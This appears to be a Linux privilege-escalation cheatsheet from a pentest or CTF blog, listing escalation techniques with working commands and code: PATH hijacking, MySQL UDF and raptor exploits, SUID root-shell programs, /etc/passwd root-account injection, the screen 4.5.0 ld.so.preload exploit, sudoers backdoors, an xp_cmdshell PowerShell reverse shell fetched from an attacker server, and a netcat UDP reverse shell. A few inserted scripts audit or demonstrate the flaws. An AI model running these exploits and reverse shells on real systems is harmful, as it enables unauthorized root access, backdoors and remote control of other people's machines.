THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE ONLY, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS
Linux Privilege Escalation Techniques
Binary PrivEsc
file binary
strings binary
cat binary
ls -la binary
Check whether the binary executes any external commands (look for system()/exec calls and command names in the strings output).
Check the paths of those commands:
If the command is "cat" instead of "/bin/cat" --> PATH injection might be possible
Decrease the size of the terminal and check for changes (a pager such as less may be in use)
less binary
./binary | less //Try getting an interactive shell through less
//Then !command executes a command from inside less; it might only work with a small enough screen size
./binary 'anycommand && /bin/bash' //If the binary hands its argument to a shell, the chained /bin/bash runs with the binary's privileges
Exploiting the path of a command used inside a binary. Example: /usr/local/bin/devil (has root privs) runs "cat" on a file in /home/freak:
cd /home/freak/
echo "/bin/sh" > cat
chmod +x cat
export PATH=/home/freak:$PATH
/usr/local/bin/devil //Get root
Getting root using MySQL when mysqld is running as root -- Priv Esc
locate udf //Needs /usr/lib/lib_mysqludf_sys.so (the sys_exec UDF) on the box; this is essential for the method to work.
mysql -u root -p
select sys_exec('usermod -a -G admin john'); //Adds john to the admin group (sudo rights on older Ubuntu)
ctrl + C //Leave the mysql client
sudo su //Re-login first so the new group membership takes effect, then enter john's password .. you are root now
Method II:
create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; //Register the UDF if it is not already listed in mysql.func
select sys_exec('chmod u+s /bin/bash');
ctrl + C
bash -p //-p keeps the SUID effective uid
Method III -> MySQL 4.x - 5.x (raptor_udf2, exploit-db 1518)
searchsploit -m exploits/linux/local/1518.c
On the target machine:
cd /tmp
wget http://192.168.0.2/1518.c //From the attacker's web server
cp 1518.c raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; //The .so has to land in the server's plugin directory (check with select @@plugin_dir;)
//If this doesn't work try this --> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
//If the server has secure_file_priv set (select @@secure_file_priv;), INTO DUMPFILE only works below that directory, and not at all when it is NULL
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func; //Confirm do_system is registered
select do_system('id > /tmp/out; chown raptor.raptor /tmp/out'); //Replace raptor with your own user
\! sh //Drop to a local shell from inside the mysql client
cat /tmp/out //Should show uid=0(root)
exit
exit
cd /tmp
vi getroot.c //add the below content to this
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main()
{
    setresuid(0, 0, 0); // set real, effective and saved uid to root
    setresgid(0, 0, 0);
    system("/bin/bash");
    return 0;
}
mysql -u root -p
select * from mysql.func;
//Creating a SUID Binary
select do_system('gcc -o /tmp/getroot /tmp/getroot.c');
select do_system('chmod u+s /tmp/getroot');
exit
exit
cd /tmp
./getroot
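Before running the raptor steps, it is worth checking whether the dump can reach the plugin directory at all. The script below is an added example, not part of this cheatsheet or raptor's exploit: since MySQL 5.7.6 the server variable secure_file_priv decides where load_file() and INTO DUMPFILE may write (MySQL packages often set it to /var/lib/mysql-files, MariaDB usually leaves it empty), and when it is set neither dumpfile target above works. udf_plan() turns the two server variables into a decision and is pure logic; udf_precheck() is the wrapper that queries a live server with the mysql client and assumes the root password is passed as its argument.

```sh
#!/bin/sh
# Added example: decide whether the UDF dump is possible before trying it.
# udf_plan is pure logic (usable offline); udf_precheck queries a live server.

# udf_plan SECURE_FILE_PRIV PLUGIN_DIR
#   NULL  -> the server refuses every file import/export: blocked
#   ''    -> no restriction: dump straight into PLUGIN_DIR
#   /dir  -> INTO DUMPFILE only works below /dir, so it is usable only when
#            PLUGIN_DIR lies inside it
# Prints the dumpfile path or the reason it is blocked; exit status 0 = usable.
udf_plan() {
    sfp=$1
    plugin_dir=${2%/}
    case "$sfp" in
        NULL)
            echo "blocked: secure_file_priv is NULL, INTO DUMPFILE is disabled"
            return 1 ;;
        "")
            echo "dumpfile: $plugin_dir/raptor_udf2.so"
            return 0 ;;
        *)
            case "$plugin_dir/" in
                "${sfp%/}/"*)
                    echo "dumpfile: $plugin_dir/raptor_udf2.so"
                    return 0 ;;
                *)
                    echo "blocked: plugin_dir $plugin_dir is outside secure_file_priv $sfp"
                    return 1 ;;
            esac ;;
    esac
}

# udf_precheck PASSWORD (assumed: mysql client on the box, root password given)
# Reads both variables from the server and feeds them to udf_plan. The sfp=/pd=
# prefixes stop an empty secure_file_priv from being swallowed by read's splitting.
udf_precheck() {
    mysql -u root -p"$1" -N -B -e \
        "select concat('sfp=', ifnull(@@secure_file_priv, 'NULL')), concat('pd=', @@plugin_dir);" |
    {
        read -r sfp pd
        udf_plan "${sfp#sfp=}" "${pd#pd=}"
    }
}

# Offline demonstration with the two values seen most often.
udf_plan '' /usr/lib/mysql/plugin                          # usable
udf_plan /var/lib/mysql-files /usr/lib/mysql/plugin || :   # blocked
```

When udf_plan reports blocked, the rest of the raptor procedure cannot work from SQL alone; a writable plugin_dir reachable some other way (for example through a cron job or a sudo rule) is then the thing to look for.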
PostgreSQL is running as root (system accounts are served from the database)
psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr //Enter the password when prompted
\dt //List tables
\dp //Get table privileges
select * from table_name; //Check the home directory column too (just in case)
Example to update a value in all matching rows:
update table_name set gid=0 where gid=1001; //Puts the account in gid 0 (group root)
or
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/'); //New account; passwd is a hash from openssl passwd
Priv Esc when "cat" is called from a system() function
When a SUID-root executable runs cat through system("cat /home/bhanu/root.txt"),
the shell started by system() looks the bare name "cat" up in PATH, from left to right.
Setting PATH to a directory we control (or putting it first) makes the shell find our
fake cat before /bin/cat.
echo $PATH
// /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
echo "/bin/bash" > cat
//If the binary is SUID rather than run through sudo, use "/bin/bash -p" here so the shell keeps the effective uid
chmod 777 cat
export PATH=/home/bhanu
echo $PATH
// /home/bhanu
./file_to_run //This file has the system() call with cat
#You get a new shell :) but as we replaced the whole PATH, nothing else resolves until it is restored:
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
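The script below is an added example, not part of this cheatsheet, that reproduces the PATH lookup behind both the devil/cat case earlier on this page and this section, entirely in a scratch directory and without any SUID binary: vulnerable_call() runs a bare "cat" through sh -c the way system() does, hardened_call() runs it under a fixed PATH the caller cannot influence, and path_hijack_demo() plants a fake cat, puts its directory first in PATH and runs both. The fake cat only prints HIJACKED instead of starting a shell; target.txt and its content are constructed for the demo.

```sh
#!/bin/sh
# Added example: PATH lookup behind the "cat in system()" trick. Nothing here is
# privileged; the fake cat prints a marker instead of starting a shell.

# Stand-in for the vulnerable binary: system("cat <file>") is /bin/sh -c with a
# bare command name, so the shell searches PATH from left to right.
vulnerable_call() {
    sh -c 'cat "$1"' sh "$1"
}

# Hardened form: a PATH the caller cannot influence (an absolute /bin/cat would
# do as well), so whatever the attacker exported is ignored.
hardened_call() {
    env PATH=/usr/bin:/bin sh -c 'cat "$1"' sh "$1"
}

# Plants a fake cat in a scratch directory, puts that directory first in PATH and
# runs both callers on a constructed target file. Prints two lines: the output of
# the vulnerable call, then the output of the hardened call.
path_hijack_demo() {
    scratch=$(mktemp -d)
    printf 'SECRET-FLAG\n' > "$scratch/target.txt"      # constructed stand-in for root.txt
    printf '#!/bin/sh\necho HIJACKED\n' > "$scratch/cat" # stands in for: echo "/bin/bash" > cat
    chmod +x "$scratch/cat"

    saved_path=$PATH
    PATH="$scratch:$PATH"; export PATH                   # attacker directory searched first
    vulnerable_call "$scratch/target.txt"                # resolves to $scratch/cat
    hardened_call "$scratch/target.txt"                  # resolves to the real cat
    PATH=$saved_path; export PATH                        # restore PATH, as the cheatsheet does after the shell pops
    rm -rf "$scratch"
}

path_hijack_demo
```

The first printed line is HIJACKED and the second is SECRET-FLAG: the same command name, run from the same process, resolves differently purely because of what the caller exported. That is the whole reason the devil and cat cases work, and why privileged code should call tools by absolute path or reset PATH before calling system().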
Priv Esc when nmap is running as root: /usr/local/bin/nmap --interactive then !sh //Only older nmap builds still have --interactive; it was removed in later releases
Priv Esc when wget is running as root (e.g. sudo wget)
Copy /etc/passwd from the target machine
On Kali:
Paste the target's /etc/passwd into a file named passwd and add this line at the end:
bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash
Serve the file (e.g. python -m SimpleHTTPServer 80)
On target:
sudo wget -O /etc/passwd http://10.10.14.13/passwd //Overwrites /etc/passwd; keep the original copy so it can be restored
su bhanu
password //The password is "password" (see the openssl passwd entry below)
Priv Esc when find is running as root: find /home -exec sh -i \;
Priv Esc when perl is running as root (e.g. via sudo, or with the cap_setuid capability):
./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Priv Esc when "PWD" is used inside a binary:
export PWD=\$\(/bin/bash\) //Run from the same directory as the binary
Priv Esc with SPICE ports (libvirt guests)
netstat -anlp | grep LIST //127.0.0.1:5900, 127.0.0.1:5901, 127.0.0.1:5902 are listening
ps -ef | grep 5900 //Shows what it is --> SPICE port; libvirt
On Kali:
apt install virt-viewer //Provides remote-viewer
proxychains remote-viewer spice://127.0.0.1:5900
proxychains remote-viewer spice://127.0.0.1:5901
proxychains remote-viewer spice://127.0.0.1:5902
When the console opens --> Send key --> ctrl+alt+del --> the guest reboots
Interrupt the boot loader --> press e --> go to the last but one line (the kernel line) --> change "ro" to "rw init=/bin/sh" and boot
passwd //Change the root password
sync //Flush the change to disk before rebooting
Priv Esc when /etc/passwd is world writable
openssl passwd -1 -salt freak password
--> generates a salted MD5-crypt hash for the /etc/passwd file;
freak = salt
password = password
$1$freak$/IWD8R6aL2zyhUZPUeAXm. --> hashed password
Entry format: username:hash:0:0::/root:/bin/bash (uid 0, gid 0, empty GECOS, home /root, shell /bin/bash)
--> creates a new account with root privileges
echo 'bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash' >>/etc/passwd
--> append this entry to /etc/passwd to get root access
su bhanu //password: password
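The script below is an added example, not part of this cheatsheet, covering both the wget and the world-writable /etc/passwd cases from two sides: root_entry() builds the line that gets appended (the hash argument is whatever openssl passwd -1 -salt produced), and audit_passwd() is the check a defender or an incident responder runs afterwards, listing every uid-0 account and flagging a world-writable passwd file. It runs against a constructed copy written by sample_passwd(), never against the real /etc/passwd; the usernames and the planted "backdoor" account are made up for the demo.

```sh
#!/bin/sh
# Added example: build the root entry the cheatsheet appends, and audit a passwd
# file for the traces that leaves. Runs against a constructed copy, not /etc/passwd.

# root_entry USERNAME HASH -> the line "USERNAME:HASH:0:0::/root:/bin/bash".
# HASH is the output of: openssl passwd -1 -salt <salt> <password>
root_entry() {
    printf '%s:%s:0:0::/root:/bin/bash\n' "$1" "$2"
}

# audit_passwd FILE -> one "uid0: <name>" line per uid-0 account (anything
# besides root is suspicious) and "world-writable: FILE" if others can write it.
audit_passwd() {
    awk -F: '$3 == 0 { print "uid0: " $1 }' "$1"
    if [ -n "$(find "$1" -perm -o+w)" ]; then
        echo "world-writable: $1"
    fi
}

# Writes a constructed passwd file (three ordinary entries plus a planted root
# account), makes it world-writable like the scenario above, and prints its path.
sample_passwd() {
    f=$(mktemp)
    {
        printf 'root:x:0:0:root:/root:/bin/bash\n'
        printf 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n'
        printf 'bhanu:x:1000:1000::/home/bhanu:/bin/bash\n'
        root_entry backdoor '$1$freak$/IWD8R6aL2zyhUZPUeAXm.'   # hash from the cheatsheet
    } > "$f"
    chmod 666 "$f"
    printf '%s\n' "$f"
}

f=$(sample_passwd)
audit_passwd "$f"   # uid0: root, uid0: backdoor, world-writable: <path>
rm -f "$f"
```

On a real host, audit_passwd /etc/passwd should print exactly one uid0 line (root) and nothing else; a second uid-0 account or a world-writable line is the signature of this technique.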
Priv Esc when /bin/bash or /bin/sh is SUID
/bin/bash -p //-p == runs without dropping the effective privs
/bin/sh -p //-p == runs without dropping the effective privs
Priv Esc when snapd < 2.37.1 is running (dirty_sock, CVE-2019-7304)
snap version //Check the version - anything before 2.37.1 is vulnerable
Run the dirty_sock exploit //Creates a new account
su dirty_sock //password: dirty_sock
snap changes //See the changes - if sudo doesn't work
Priv Esc when screen 4.5.0 is SUID root
https://www.exploit-db.com/exploits/41154
Save the content below into rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    char *argv[] = {"/bin/sh", NULL}; // execvp takes an argv array
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp(argv[0], argv);
    return 1; // only reached if exec fails
}
gcc -o /tmp/rootshell /tmp/rootshell.c //Compile it
Save the content below into libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);  // runs as root inside the SUID screen process
    chmod("/tmp/rootshell", 04755); // make rootshell SUID root
    unlink("/etc/ld.so.preload");   // clean up so nothing else preloads this library
    printf("[+] done!\n");
}
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c //Compile it
Copy both compiled files into /tmp on the target machine (or compile them there, so the .so matches the target's libc).
Follow the commands below:
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" //The SUID screen creates /etc/ld.so.preload as root, pointing at our library
screen -ls //The next SUID screen process preloads libhax.so, which runs dropshell()
/tmp/rootshell
When a wildcard is used in sudo
sudo -l //Wildcard example --> /home/*/*/file.txt (this case is vulnerable) or /var/www/*/*/file.txt
dpkg -l sudo //Check the sudo version (1.8.16 in this example)
searchsploit sudoedit
searchsploit -m linux/local/37710.txt //sudoedit symlink trick
Exploitation (inside the wildcard base directory, e.g. /var/www):
mkdir folder1
cd folder1
mkdir folder2
cd folder2
ln -s /home/username/.ssh/authorized_keys file.html //Create a symbolic link
sudoedit -u username /var/www/folder1/folder2/file.html //Add id_rsa.pub here
OR
sudoedit -u username /var/www/ .ssh/authorized_keys /file.html //The editor opens the arguments as separate files, where .ssh/authorized_keys can be edited
On Kali:
ssh-keygen //Copy id_rsa.pub into authorized_keys (which is file.html)
ssh -i id_rsa username@IP_ADDRESS
Priv Esc for chkrootkit
cat /etc/crontab //chkrootkit is run from cron as root
dpkg -l chkrootkit //chkrootkit 0.49-4ubuntu1
searchsploit -m exploits/linux/local/33899.txt //chkrootkit 0.49 executes /tmp/update as root
cd /tmp
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update
sudo su //After the cron job has run, run this and get root :)
ssh user@target -t "/bin/bash" --> Escaping a limited shell by forcing the command SSH runs (user@target = your login on the target)
Running applications over SSH
ssh user@target "/usr/sbin/tcpdump -i ens33 -U -s0 -w - 'not port 22'" > network.cap
-s0 = capture full packets; -U = flush each packet; -w - = write the capture to stdout; 'not port 22' = do not capture the SSH traffic itself
wireshark -r network.cap //Open the saved capture
ssh user@target "/usr/sbin/tcpdump -i lo -U -s0 -w - 'not port 22'" | wireshark -k -i -
//View the traffic live: -k starts capturing immediately, -i - reads from stdin
import os; os.system("/bin/bash") --> Escaping a limited shell when it is a Python console
Connecting to SQL Server
sqsh -S 10.10.10.59 -U username -P password
xp_cmdshell 'whoami' //Execute commands
go
//If xp_cmdshell is not turned on --> enable it first:
EXEC sp_configure 'show advanced options', 1
reconfigure
go
EXEC sp_configure 'xp_cmdshell', 1
reconfigure
go
xp_cmdshell 'whoami'
go
Getting a reverse shell
cp nishang/Shells/Invoke-PowerShellTcp.ps1 nishang.ps1
Add this line at the end of the file & save it:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.11 -Port 9001
python -m SimpleHTTPServer 8001
nc -nvlp 9001
xp_cmdshell "powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.11:8001/nishang.ps1')"
go
We get a shell on the netcat listener
Priv Esc with a Python console
import os
os.popen("whoami").read()
os.popen("find /etc | grep iptables").read() //Check which ports are reachable for a reverse shell
os.popen("base64 -w 0 /etc/iptables/rules.v4").read() //Read files as base64; check the allowed ports
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.0.0.1 1234 >/tmp/f").read() //UDP reverse shell
nc -u -nvlp 1234 //Catch the UDP shell
Priv Esc - openssl capabilities: read root files
getcap openssl //Should show "=ep" (all capabilities effective and permitted)
openssl enc -in "/etc/passwd" //No cipher given, so enc just copies the file to stdout
openssl enc -in "/root/root.txt"
Getting a root shell using openssl
./openssl enc -in /etc/sudoers > sudoers
vi sudoers //Add the line below to the sudoers file, after root ALL=(ALL) ALL
Username ALL=(ALL) ALL
cat ./sudoers | ./openssl enc -out /etc/sudoers //Writes the modified sudoers back; sudo now works for Username
Let me know if I missed something important. You can find the Windows Privilege Escalation cheatsheet here.